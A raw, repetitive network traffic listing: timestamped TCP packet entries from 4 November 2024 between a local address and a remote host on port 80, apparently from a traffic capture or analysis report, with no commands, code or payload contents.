                                                              Nov 4, 2024 09:27:58.781100988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781112909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781137943 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781163931 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781233072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781244040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781259060 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781270027 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781280041 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781284094 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781294107 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781297922 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781320095 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781344891 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781374931 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781385899 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781407118 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781421900 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781542063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781553984 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781565905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781575918 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781577110 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781591892 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781591892 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781610012 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781615973 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781624079 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781646013 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781662941 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781733036 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781744957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781755924 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781766891 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781769037 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781781912 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781791925 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781804085 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781816006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781826019 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781829119 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781852007 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781876087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781877995 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781888962 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781899929 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.781929016 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.781953096 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.808551073 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.808562040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.808573008 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.808584929 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.808593035 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.808636904 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.852642059 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.852660894 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.852674961 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.852686882 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.852701902 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.852714062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.852726936 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.852726936 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.852740049 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.852782965 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882589102 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882605076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882618904 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882632971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882644892 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882653952 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882667065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882673979 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882679939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882693052 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882705927 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882718086 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882719040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882735014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882739067 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882747889 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882760048 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882766962 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882774115 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882791996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882796049 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882805109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882818937 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882827044 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882832050 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882844925 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882858992 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882864952 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882873058 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882882118 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882886887 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882900000 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882903099 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882915974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882926941 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882936954 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882956028 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882968903 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882965088 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882982016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.882982969 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.882999897 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883012056 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883012056 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883024931 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883035898 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883038998 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883054018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883064032 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883065939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883079052 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883090973 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883095026 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883111000 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883115053 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883126020 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883127928 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883141041 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883151054 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883156061 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883168936 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883168936 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883183002 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883183956 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883197069 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883208990 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883212090 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883222103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883234978 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883238077 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883248091 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883260965 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883268118 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883275032 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883286953 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883291960 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883300066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883318901 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883321047 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883335114 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883342981 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883352995 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883363962 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883373022 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883378029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883389950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883392096 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883403063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883414030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883414984 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883428097 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883440018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883441925 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883452892 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883457899 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883467913 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883481026 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883486032 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883496046 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883510113 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.883511066 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883527994 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.883553982 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.891999960 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892019987 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892033100 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892046928 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892062902 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892090082 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892102957 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892148018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892162085 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892174006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892184019 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892188072 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892199039 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892204046 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892215967 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892236948 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892252922 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892281055 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892297029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892329931 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892477036 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892489910 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892502069 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892513990 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892513990 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892529964 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892545938 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892573118 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892621040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892633915 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892647028 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892659903 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892672062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892673016 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892689943 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892693043 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892702103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892709970 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892736912 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892759085 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892770052 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892781973 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892812967 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892941952 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892955065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892966986 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.892976046 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.892980099 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893002987 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893027067 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893126011 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893137932 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893150091 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893163919 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893172026 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893177032 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893189907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893193007 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893212080 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893227100 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893276930 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893290997 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893304110 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893326044 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893357038 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893439054 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893455029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893465996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893485069 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893487930 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893506050 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893531084 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893575907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893640041 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893728018 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893742085 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893753052 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893765926 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893774986 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893779039 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893791914 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893801928 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893820047 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893845081 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893863916 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893877029 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893888950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893901110 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893912077 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893913984 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893928051 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893928051 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893940926 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.893946886 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893969059 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893980026 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.893994093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894006968 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894018888 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894026995 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894042969 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894058943 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894190073 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894203901 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894217014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894224882 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894231081 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894243002 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894254923 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894269943 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894355059 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894367933 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894381046 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894387007 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894395113 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894402981 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894411087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894418955 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894434929 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894458055 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894495964 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894546032 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894665003 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894680023 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894690990 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894702911 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894706011 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894718885 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894735098 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894850016 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894862890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894874096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894886017 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894892931 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894896030 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894898891 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.894925117 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894941092 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.894995928 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895009041 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895019054 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895030975 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.895030975 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895047903 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895052910 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.895062923 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895075083 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895076036 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.895091057 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895101070 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.895104885 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895127058 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.895142078 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.895950079 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895961046 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895973921 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895987988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.895994902 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896020889 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896104097 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896117926 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896130085 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896138906 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896145105 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896158934 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896167994 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896193027 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896239042 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896250963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896266937 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896281958 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896297932 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896401882 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896415949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896429062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896437883 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896444082 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896471977 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896497011 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:58.896576881 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:58.896589994 CET804993289.40.31.232192.168.2.7
